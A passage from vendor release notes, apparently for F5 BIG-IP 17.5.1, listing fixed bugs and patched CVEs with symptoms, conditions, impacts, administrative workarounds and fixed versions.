- NIC is configured to have an MTU less than NDAL's configured MTU. By default, this is an MTU < 9198

Impact:
TMM goes into a restart loop and fails to start

Workaround:
Create /config/tmm_init.tcl with the following entry
ndal mtu <value> 1af4:1041

Replacing <value> with the corresponding value in the following log line in /var/log/tmm
  notice virtio_mtu_set(): MTU should be between 68 and <value>

Fix:
Refactored code to not restart TMM if set MTU operation fails.

Fixed Versions:
17.5.1

1470177-6 : CVE-2023-46218 curl: information disclosure by exploiting a mixed case flaw

Links to More Info: K000138650

1469393-2 : Browser extension can cause Bot-Defense profile screen to misfunction

Links to More Info: BT1469393

Component: Application Security Manager

Symptoms:
One of the ad-blocker browser extensions is reported to cause bot-defense GUI not working properly.

Conditions:
Ad-blocker extension installed in browser

Impact:
Bot-defense screen might not work properly

Workaround:
Disable ad-blocker extension or use private/incognito mode.

Fixed Versions:
17.5.1

1441577-6 : CVE-2023-42795 tomcat: improper cleaning of recycled objects could lead to information leak

Links to More Info: K000138178, BT1441577

1401961-4 : A blade with a non-functional backplane may override the dag context for the whole system

Links to More Info: BT1401961

Component: TMOS

Symptoms:
A blade with a non-functional backplane may override the dag context for the whole system.

Conditions:
- a blade has backplane problems, as evidenced by "shared random" not being ready in `tmctl -d blade tmm/ready_for_world_stat`.

Impact:
The traffic is black-holed into a non-functional blade.

Workaround:
Depending on the nature of the blade fault, a workaround is to either disable or just reboot the non-functional blade.

Fix:
A blade with a non-functional backplane cannot override the dag context for the whole system anymore.

Fixed Versions:
17.5.1

1400533-5 : TMM core dump include SIGABRT multiple times, on the Standby device.

Links to More Info: BT1400533

Component: Access Policy Manager

Symptoms:
The tmm running on the Standby device is repeatedly killed by sod. There are number of SessionDB ERROR messages on the tmm log.

/var/log/tmm1:
notice session_ha_context_callback: SessionDB ERROR: received invalid or corrupt HA message; dropped message.

Conditions:
-- BIG-IP configured for high availability (HA)
-- Mirroring enabled
-- APM enabled
-- Traffic is being passed on the active device

Impact:
Tmm restarts on the standby device. If a failover occurs while the tmm is restarting, traffic is disrupted.

Workaround:
None

Fix:
Persisting sub-session information only in the active device, after the expiry.

Fixed Versions:
17.5.1

1393733-8 : CVE-2022-43750 kernel: memory corruption in usbmon driver

Links to More Info: K000139700, BT1393733

1390457-6 : CVE-2022-25147 apr-util: out-of-bounds writes in the apr_base64

Links to More Info: K000137702

1382313-5 : TMM might crash under certain conditions

Component: TMOS

Symptoms:
In select scenarios, specific configurations related to DDoS may inadvertently elevate the likelihood of instability within the tmm process.

Conditions:
DDoS configured.

Impact:
Elevated likelihood of instability within the tmm process.

Workaround:
Disable sPVA feature, use the following commands:

tmsh -c 'modify sys db dos.forceswdos value true'
tmsh -c 'list sys db dos.forceswdos'
# this should print "true"

sys db dos.forceswdos {
    value "true"
}

Note: This has a performance impact, as all DDoS function is handled in software.

Fix:
tmm does not crash.

Fixed Versions:
17.5.1

1382181-2 : BIG-IP resets only server-side on idle timeout when used FastL4 profile with loose-* settings enabled★

Links to More Info: BT1382181

Component: Local Traffic Manager

Symptoms:
After upgrading to BIG-IP 17.1.0, observed that some of the client sessions are orphaned, this has caused multiple intermittent connection failures when connecting through BIG-IP.
When the FastL4 profile with loose-* settings enabled is used and an idle timeout of 300 seconds, after idle time of 300 seconds, the server-side connection resets but no reset is sent towards client.

Conditions:
- Use BIG-IP version 17.1.0 and above
- Use Fastl4 profile with loose-* settings enabled.
- Configure idle timeout values.

Impact:
Some client sessions will be orphaned and cause intermittent connection failures when trying to connect through BIG-IP.

Workaround:
If not required for a particular use case, then disable loose-close settings in Fastl4 profile.

Fixed Versions:
17.5.1

1365629-5 : FPS signature and engine update fail to access sys db key proxy.password

Links to More Info: BT1365629

Component: Application Security Manager

Symptoms:
FPS signature and engine update via proxy with password authentication fails

Conditions:
FPS signature and engine update via proxy that requires password authentication

Impact:
Automatic updates of FPS signatures and engine do not work when an HTTP proxy is configured.

Workaround:
Manually upload the file

Fixed Versions:
17.5.1.1, 17.1.2

1353609-8 : ZebOS BGP vulnerability CVE-2023-45886

Links to More Info: K000137315, BT1353609

1352649-4 : The trailing semicolon at the end of [HTTP::path] in the iRule is being omitted.

Links to More Info: BT1352649

Component: Local Traffic Manager

Symptoms:
When a http request with URL containing only one semi-colon at the end, it is omitted with HTTP::PATH

Conditions:
Basic http Virtual Server and request URL with ';' at the end

Impact:
[HTTP::PATH] incorrectly omits ';'

Workaround:
None

Fix:
Count on semicolon for HTTP::PATH even when there is no host-extension

Fixed Versions:
17.5.1

1336185-6 : NodeJS Vulnerability - CVE-2018-12122

Links to More Info: K000137090, BT1336185

1330801-8 : NodeJS Vulnerability CVE-2018-12123, CVE-2018-12121, CVE-2018-12122

Links to More Info: K000137090, BT1330801

1327169-7 : CVE-2023-24329 python: urllib.parse url blocklisting bypass

Links to More Info: K000135921, BT1327169

1326665-6 : CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

Links to More Info: K000135831

1314333-2 : Patch gnutls library for CVEs CVE-2018-10844, CVE-2018-10845, CVE-2018-10846

Component: TMOS

Symptoms:
These vulnerabilities affect the HMAC and CBC-mode processing in GnuTLS, making it susceptible to Lucky Thirteen-style timing attacks. By measuring response times for crafted TLS/DTLS packets, attackers can infer partial plaintext data. The high complexity of the attack, reliance on network conditions, and mitigations in later TLS versions result in an Attack Complexity (AC) of High.

Conditions:
NA

Impact:
CVE-2018-10844 – Affects HMAC-SHA-256 processing in GnuTLS, leading to possible plaintext recovery via statistical analysis of response times. CVE-2018-10845 – Targets CBC-mode padding handling, potentially exposing additional side-channel leaks. CVE-2018-10846 – Affects DTLS (Datagram TLS), making real-time encrypted communication (e.g., VoIP, VPNs) vulnerable to timing-based attacks.

Workaround:
Disable CBC-mode cipher suites in TLS configurations to prevent this attack vector.
Use TLS 1.3, as it eliminates CBC-mode ciphers and improves security.
Minimize the exposure of GnuTLS-based services to untrusted networks.

Fix:
Patched gnutls to fix the Vulnerability

Fixed Versions:
17.5.1.1

1309637-5 : Mac masquerade not working after VLAN movement on host interfaces

Links to More Info: BT1309637

Component: Local Traffic Manager

Symptoms:
Connectivity to the floating IP via the masquerade MAC fails when the VLAN is moved across interfaces.

Conditions:
-- BIG-IP is configured with a floating IP on a traffic group
-- MAC masquerade is enabled
-- The VLAN is assigned to a different interface

Impact:
Connectivity to the floating IP address fails following a failover.

Workaround:
After the VLAN movement, delete and reconfigure the MAC masquerade.

Fixed Versions:
17.5.1

1306309-4 : CVE-2023-28709 Apache tomcat: Fix for CVE-2023-24998 was incomplete

Links to More Info: K000135262, BT1306309

1306305-2 : CVE-2023-24998 [Apache Tomcat]: FileUpload DoS with excessive parts

Links to More Info: K000133052

1304081-7 : CVE-2023-2650 openssl: Possible DoS translating ASN.1 object identifiers

Links to More Info: K000135178, BT1304081

1301545-7 : CVE-2023-0568 php: 1-byte array overrun in common path resolve code

Links to More Info: K000134747, BT1301545

1292605-4 : Uncaught ReferenceError: ReferenceError: REquest is not defined

Links to More Info: BT1292605

Component: Access Policy Manager

Symptoms:
The Cache-fm-Modern.js file has a typo.

Conditions:
This issue occurs when using Modern JS support EHF.

Impact:
A Javascript error occurs: "Uncaught ReferenceError: ReferenceError: REquest is not defined".

Workaround:
Correct the typo and give the iRule with iFile workaround.

Fix:
The word "REquest" should be "Request" at all the places where there is a typo error.

Fixed Versions:
17.5.1

1282837-4 : DTLS1.2 Handshakes are causing tmm crash with mTLS connection

Component: Local Traffic Manager

Symptoms:
TMM crash will be observed during the DTLS1.2 handshake.

Conditions:
ServerSSL profile configured with,
 - key and certificate.
 - ssl-sign-hash value is Any

A backend server configured with DTLS1.2 protocol and enabled client authentication.

Impact:
TMM will crash for each DTLS1.2 handshake.

Workaround:
In serverSSL profile, select the ssl-sign-hash to SHA-256.

Fix:
DTLS1.2 handshakes perform as expected.

Fixed Versions:
17.5.1

1273161-5 : Secondary blades are unavailable, clusterd is reporting shutdown, and waiting for other blades

Links to More Info: BT1273161

Component: Local Traffic Manager

Symptoms:
On a multi-slot chassis, VCMP guest, or F5OS tenant, clusterd can enter a shutdown state causing some slots to become unavailable.

The event that can cause this is called a partition and occurs when clusterd stops receiving heartbeat packets from a slot over the mgmt_bp interface but is still receiving them over the tmm_bp interface.

Here is the error that is logged when this occurs:

Mar 17 10:38:28 localhost err clusterd[4732]: 013a0004:3: Marking slot 1 SS_FAILED due to partition detected on mgmt_bp from peer 2 to local 1

When this occurs, clusterd enters a shutdown state and at times will never recover.

Here is an example, tmsh show sys cluster command where clusterd is in the shutdown yet waiting state:

-----------------------------------------
Sys::Cluster: default
-----------------------------------------
Address 172.0.0.160/23
Alt-Address ::
Availability available
State enabled
Reason Cluster Enabled
Primary Slot ID 2
Primary Selection Time 03/17/23 10:38:30

  ----------------------------------------------------------------------------------
  | Sys::Cluster Members
  | ID Address Alt-Address Availability State Licensed HA Clusterd Reason
  ----------------------------------------------------------------------------------
  | 1 :: :: unknown enabled false unknown shutdown ShutDown: default/1 waiting for blade 2
  | 2 :: :: available enabled true standby running Run

Conditions:
Multi-slot chassis, VCMP guest, or F5OS tenant.
A blade determines there is a partition where it's receiving cluster packets over the tmm_bp interface but not the mgmt_bp interface.

Impact:
The unavailable slots/blades will not accept traffic.

Workaround:
Running tmsh show sys cluster will report the primary slot and all slot statuses.

For all blades reporting shutdown or (less likely) initializing and "waiting for blade(s)", restart clusterd on that slot with bigstart restart clusterd. Ensure you do not restart clusterd on the primary slot.

Fix:
None

Fixed Versions:
17.5.1.1

1270257-8 : CVE-2023-0662 php: DoS vulnerability when parsing multipart request body

Links to More Info: K000133753, BT1270257

1269709-5 : GUI should throw the error when the VS is configured with both vdi and HTTP/2 profiles

Links to More Info: BT1269709

Component: Access Policy Manager

Symptoms:
As the VDI profile is currently not supported in the HTTP/2 environment for which there is no warning message on the BIG-IP GUI about this limitation.

Conditions:
When both VDI Profile and HTTP/2 Profile is attached to the VS.

Impact:
The customer wants this error to be displayed on the BIGIP GUI if vdi and http/2 profiles both are attached to the VS together.

Workaround:
None

Fix:
Display the warning message on the BIG-IP GUI for the Configuration error: "Virtual server cannot have vdi and http/2 profiles at the same time" when both vdi and http/2 profiles are attached on the VS.

Fixed Versions:
17.5.1, 17.1.2, 16.1.5

1267221-5 : When TMM starts, Hyper-V shows no RX packets on the ethX interface★

Links to More Info: BT1267221

Component: Local Traffic Manager

Symptoms:
BIG-IP Virtual Edition (VE) running on a Hyper-V host, when TMM starts, it sets the NIC queue count. When this happens, due to a bug in Hyper-V, ingress packets are no longer received on the data plane interfaces.

Packets egressed from TMM are being correctly sent to peer devices on the network.

Conditions:
- After upgrading from BIG-IP version 12, none of the data plane interfaces show ingress counters incrementing and no traffic is seen on the interface. The Management interface works properly.

Impact:
The data plane interfaces does not show ingress counters incrementing and no traffic is seen on the interface.

Workaround:
In Hyper-V manager, save the machine state and then start it back up or use a legacy network adapter.

Fix:
This change provides a workaround to not set the NIC queue counts if they are already set properly. To utilize this workaround the amount of memory should be verified so that the number of TMMs equals the number of CPUs on the VM.

A new log message in /var/log/tmm will log whether or not TMM changed the queue count.

Fixed Versions:
17.5.1

1266853-8 : CVE-2023-24998 Apache Commons FileUpload: FileUpload DoS with excessive parts

Links to More Info: K000133052

1240373-4 : CVE-2022-37436: Flaw in mod_proxy module of httpd

Links to More Info: K000132665

1144673-5 : Persistent Connection Issue in SSO v2 Plugin

Component: Access Policy Manager

Symptoms:
After a SAML flow is completed and sessions are removed following Single Logout (SLO), some connections may stay active in the flow table if the client does not initiate a reset (RST). The SSO plugin fails to properly manage shutdown events, causing these connections to remain open instead of being closed.

Conditions:
BIG-IP is configured as both a SAML Service Provider (SP) and Identity Provider (IDP), with Single Logout (SLO) enabled, and users remain on the browser after logging out.

Impact:
Persistent connections could lead to resource strain and may affect system performance.

Workaround:
NA

Fix:
No more idle connections in flow table.

Fixed Versions:
17.5.1

1144421-3 : CVE-2019-14866 cpio: improper input validation when writing tar header fields leads to unexpected tar generation

Component: TMOS

Symptoms:
cpio does not properly validate the values written in the header of a TAR file through the to_oct() function. When creating a TAR file from a list of files and one of those is another TAR file with a big size, cpio will generate the resulting file with the content extracted from the input one. This leads to unexpected results as the newly generated TAR file could have files with permissions the owner of the input TAR file did not have or in paths he did not have access to.

Conditions:
Occurs when creating tar archives with unvalidated or specially crafted input filenames.

Impact:
This vulnerability may generate malformed tar files, leading to interoperability issues or unexpected behavior in downstream tools.

Workaround:
NA

Fix:
Patched python to fix the vulnerability.

Fixed Versions:
17.5.1

1132449-6 : Incomplete or missing IPv6 IP Intelligence database results to connection reset and/or high TMM CPU usage

Links to More Info: BT1132449

Component: Advanced Firewall Manager

Symptoms:
The following IPv4 database load message is present in /var/log/ltm:
015c0010:5: Initial load of IPv4 Reputation database has been completed

Note the absence of the IPv6 version of the same message:

015c0010:5: Initial load of IPv6 Reputation database has been completed

Some scenarios can result in elevated TMM CPU utilization, for example, when using IPI in global policy.

The message "Scheduling priority: normal. Nice level: -19" is seen at a rate of about 100 lines per second, per tmm, in the /var/log/tmm* logs:

Conditions:
Failure to download IPv6 database from localdb-ipv6-daily.brightcloud.com.

Impact:
Any of the following:

- TCL error results when IPI is used in an iRule resulting in connection being reset.

- When using IPI in global policy, increased TMM CPU utilization may occur which leads to idle enforcer being triggered, TMM clock advanced messages appearing in LTM logs, or TMM restarting without core when MCPD is unable to communicate with TMM.

Workaround:
Ensure that BIG-IP is able to communicate using https with BrightCloud servers, including localdb-ipv6-daily.brightcloud.com. For more detailed troubleshooting steps, see K03011490 at https://my.f5.com/manage/s/article/K03011490.

Once the IPv6 reputation database has been retrieved and loaded issues should stop.

This line in ltm log shows load has completed:
015c0010:5: Initial load of IPv6 Reputation database has been completed

Fix:
None

Fixed Versions:
17.5.1, 16.1.6

1121517-5 : Interrupts on Hyper-V are pinned on CPU 0

Links to More Info: BT1121517

Component: TMOS

Symptoms:
CPU 0 utilization is much higher relative to other CPUs due to high amount of softirq.

Conditions:
BIG-IP is deployed on a Hyper-V platform.

Impact:
Performance is degraded.

Fix:
Interrupts are balanced across all CPUs.

Fixed Versions:
17.5.1, 16.1.4, 15.1.10

1099369-9 : CVE-2018-25032 [NodeJS]zlib: A flaw found in zlib, when compressing (not decompressing!) certain inputs.

Links to More Info: K21548854

1093685-8 : CVE-2021-4083 kernel: fget: check that the fd still exists after getting a ref to it

Links to More Info: K52379673, BT1093685

1081245-3 : [APM] SSO OAuth Bearer passthrough inserts an old access token instead of the latest one.

Links to More Info: BT1081245

Component: Access Policy Manager

Symptoms:
SSO Bearer authorization fails.

Conditions:
APM PRP is configured with just an OAuth Scope and SSO Bearer attached to PSP.

Impact:
Fails to read new token from request and forwards old token in session variables to backend pool after validation.

Workaround:
1. Configure a PSP of type 'OAuth-RS'
   a. Add OAuth Scope
   b. Add Variable assign with following expression
apm policy agent variable-assign /Common/RStype_AP_act_variable_assign_ag {
    variables {
        {
            expression "mcget {session.oauth.client.last.access_token}"
            secure true
            varname session.oauth.client./Common/oauth-aad-server.access_token
        }
    }
}

2. Configure PRP with Gating Criteria (As per your setup)
   a. Add a Variable-Assign inside SBR (subroutine)
apm policy agent variable-assign /Common/empty_act_variable_assign_ag {
    variables {
        {
            expression "mcget -secure {subsession.oauth.client.last.access_token}"
            secure true
            varname session.oauth.client./Common/oauth-aad-server.access_token
        }
    }
}

Fix:
N/A

Fixed Versions:
17.5.1

1078713-1 : Windows 11 not included in client OS check and Windows Info agent.

Links to More Info: BT1078713

Component: Access Policy Manager

Symptoms:
Branches/rules are not available for Windows 11 in the access policy.

Conditions:
-- Client OS check.
-- Windows Info agent.

Impact:
Unable to use client OS check and Windows Info agent for Windows 11.

Workaround:
Windows 10 and 11 share the same major and minor version and Windows 11 is differentiated by its build number, 22000.

Adding a "Windows Registry" agent such as this before the "Windows Info" agent do branch off Windows 11 machines.
"HKEY_LOCAL_MACHINE＼SOFTWARE＼Microsoft＼Windows NT＼CurrentVersion"."CurrentBuildNumber">="22000"

Fix:
N/A

Fixed Versions:
17.5.1

1069949-8 : CVE-2018-1000007 curl: HTTP authentication leak in redirects

Component: TMOS

Symptoms:
libcurl might accidentally leak authentication data to third parties.

When asked to send custom headers in its HTTP requests, libcurl will send that set of headers first to the host in the initial URL but also, if asked to follow redirects and a 30X HTTP response code is returned, to the host mentioned in URL in the `Location:` response header value.

Sending the same set of headers to subsequent hosts is, in particular, a problem for applications that pass on custom `Authorization:` headers, as this header often contains privacy-sensitive information or data that could allow others to impersonate the libcurl-using client's request.

Conditions:
NA

Impact:
Sensitive information could be disclosed to an unauthorised user

Workaround:
NA

Fix:
Patched curl to fix the vulnerability.

Fixed Versions:
17.5.1

1069341-2 : CVE-2016-4738 libxslt: Heap overread due to an empty decimal-separator

Component: TMOS

Symptoms:
libxslt in Apple iOS before 10, OS X before 10.12, tvOS before 10, and watchOS before 3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site

Conditions:
NA

Impact:
It can result in DoS.

Workaround:
NA

Fix:
libxslt has been patched to address this vulnerability.

Fixed Versions:
17.5.1.1

1068653-3 : CVE-2021-20271 rpm: Signature checks bypass via corrupted rpm package

Links to More Info: K10396196

1061485-9 : CVE-2019-19527: Linux kernel vulnerability

Component: TMOS

Symptoms:
A vulnerability was found in hiddev_open in drivers/hid/usbhid/hiddev.c in the USB Human Interface Device class subsystem, where an existing device must be validated prior to its access. The device should also ensure the hiddev_list cleanup occurs at failure, as this may lead to a use-after-free problem, or possibly escalate privileges to an unauthorized user.

Conditions:
NA

Impact:
Unauthorised access to BIGIP device

Workaround:
NA

Fix:
Patched kernel to fix the vulnerability.

Fixed Versions:
17.5.1.1

1059229-3 : CVE-2019-16994 kernel: Memory leak in sit_init_net() in net/ipv6/sit.c

Component: TMOS

Symptoms:
A flaw was found in the way the sit_init_net function in the Linux kernel handled resource cleanup on errors. This flaw allows an attacker to use the error conditions to crash the system.

Conditions:
Linux kernel versions before 5.0

Impact:
It can result in DoS.

Workaround:
N/A

Fix:
kernel has been patched to address this vulnerability.

Fixed Versions:
17.5.1.1

1058197-10 : CVE-2019-14973: LibTIFF Vulnerability

Component: TMOS

Symptoms:
_TIFFCheckMalloc and _TIFFCheckRealloc in tif_aux.c in LibTIFF through 4.0.10 mishandle Integer Overflow checks because they rely on compiler behaviour that is undefined by the applicable C standards. This can, for example, lead to an application crash.

Conditions:
NA

Impact:
It could lead to minor disruptions in service (availability impact) and may expose or modify some non-sensitive information (confidentiality and integrity impact)

Workaround:
unauthorized users cannot access the systems

Fix:
Patched LibTIFF to fix the vulnerability.

Fixed Versions:
17.5.1.1

1057141-7 : CVE-2018-14647 python: Missing salt initialization in _elementtree.c module

Links to More Info: K000151007, BT1057141

1052333-8 : CVE-2018-16885: Linux kernel vulnerability

Component: TMOS

Symptoms:
A flaw was found in the Linux kernel that allows the userspace to call memcpy_fromiovecend() and similar functions with a zero offset and buffer length. This can cause a read beyond the buffer boundaries flaw and, in certain cases, cause a memory access fault and a system halt by accessing an invalid memory address.

Conditions:
NA

Impact:
This can cause a read beyond the buffer boundaries flaw.

Workaround:
NA

Fix:
Patched kernel to fix the vulnerability.

Fixed Versions:
17.5.1.1

1052249-8 : CVE-2018-13094 kernel: NULL pointer dereference in xfs_da_shrink_inode function

Component: TMOS

Symptoms:
An issue was discovered in the XFS filesystem in fs/xfs/libxfs/xfs_attr_leaf.c in the Linux kernel. A NULL pointer dereference may occur for a corrupted xfs image after xfs_da_shrink_inode() is called with a NULL bp. This can lead to a system crash and a denial of service.

Conditions:
NA

Impact:
Exploitation of the vulnerability could cause the system to become unavailable (DoS).

Workaround:
Limit physical or local access to the system

Fix:
Patched kernel to fix the vulnerability.

Fixed Versions:
17.5.1

1052245-9 : CVE-2018-13093 kernel: NULL pointer dereference in lookup_slow function

Component: TMOS

Symptoms:
An issue was discovered in the XFS filesystem in fs/xfs/xfs_icache.c in the Linux kernel. There is a NULL pointer dereference leading to a system panic in lookup_slow() on a NULL inode->i_ops pointer when doing path walks on a corrupted xfs image. This occurs because of a lack of proper validation that cached inodes are free during an allocation.

Conditions:
Linux kernel versions before 4.17.3 are vulnerable

Impact:
It can result in DoS.

Workaround:
N/A

Fix:
kernel has been patched to address this vulnerability.

Fixed Versions:
17.5.1.1

1052217-8 : CVE-2018-19985 kernel: oob memory read in hso_probe in drivers/net/usb/hso.c

Component: TMOS

Symptoms:
A flaw was found in the Linux kernel in the function hso_probe() which reads if_num value from the USB device (as an u8) and uses it without a length check to index an array, resulting in an OOB memory read in hso_probe() or hso_get_config_data(). An attacker with forged USB device with a physical access to a system (needed to connect such a device) can cause a system crash and a denial-of-service.

Conditions:
NA

Impact:
The primary impact of this vulnerability is a denial-of-service (DoS) due to the kernel crash

Workaround:
NA

Fix:
Patched kernel to fix the vulnerability.

Fixed Versions:
17.5.1

1052181-8 : CVE-2018-7191 kernel: denial of service via ioctl call in network tun handling

Component: TMOS

Symptoms:
In the tun subsystem in the Linux kernel, a local attacker could issue an ioctl to call dev_get_valid_name which is not called before register_netdevice. This allows local users to cause a denial of service (NULL pointer dereference and panic) via an ioctl(TUNSETIFF) call with a dev name containing a / character.

Conditions:
Linux kernel versions before 4.13.14 are vulnerable

Impact:
It can result in DoS.

Workaround:
N/A

Fix:
kernel has been patched to address this vulnerability.

Fixed Versions:
17.5.1.1

1051869-9 : CVE-2018-20169: Linux kernel vulnerability

Component: TMOS

Symptoms:
A flaw was discovered in the Linux kernel's USB subsystem in the __usb_get_extra_descriptor() function in the drivers/usb/core/usb.c which mishandles a size check during the reading of an extra descriptor data. By using a specially crafted USB device which sends a forged extra descriptor, an unprivileged user with physical access to the system can potentially cause a privilege escalation or trigger a system crash or lock up and thus to cause a denial of service (DoS).

Conditions:
NA

Impact:
Unauthorized access to sensitive information, Unauthorized modification or corruption of data

Workaround:
Limit access to the affected systems to trusted networks or users.

Fix:
Patched kernel to fix the vulnerability.

Fixed Versions:
17.5.1.1

1051769-8 : CVE-2019-10140 kernel: overlayfs: NULL pointer dereference in ovl_posix_acl_create function in fs/overlayfs/dir.c

Component: TMOS

Symptoms:
An attacker with local access can create a denial of service situation via a NULL pointer dereference in ovl_posix_acl_create function in fs/overlayfs/dir.c. This can allow attackers with the ability to create directories on overlayfs to crash the kernel creating a denial of service (DOS).

Conditions:
Linux kernel versions before 3.10 are vulnerable

Impact:
It can result in DoS.

Workaround:
N/A

Fix:
kernel has been patched to address this vulnerability.

Fixed Versions:
17.5.1.1

1051697-9 : CVE-2019-11833 kernel: fs/ext4/extents.c leads to information disclosure

Component: TMOS

Symptoms:
A flaw was found in the Linux kernels implementation of ext4 extent management which did not correctly initialize memory regions in the extent tree block which may be exported to a local user to obtain sensitive information by reading empty/uninitialized data from the filesystem.

Conditions:
Linux kernel versions before 5.1.2 are vulnerable

Impact:
It can result in information disclosure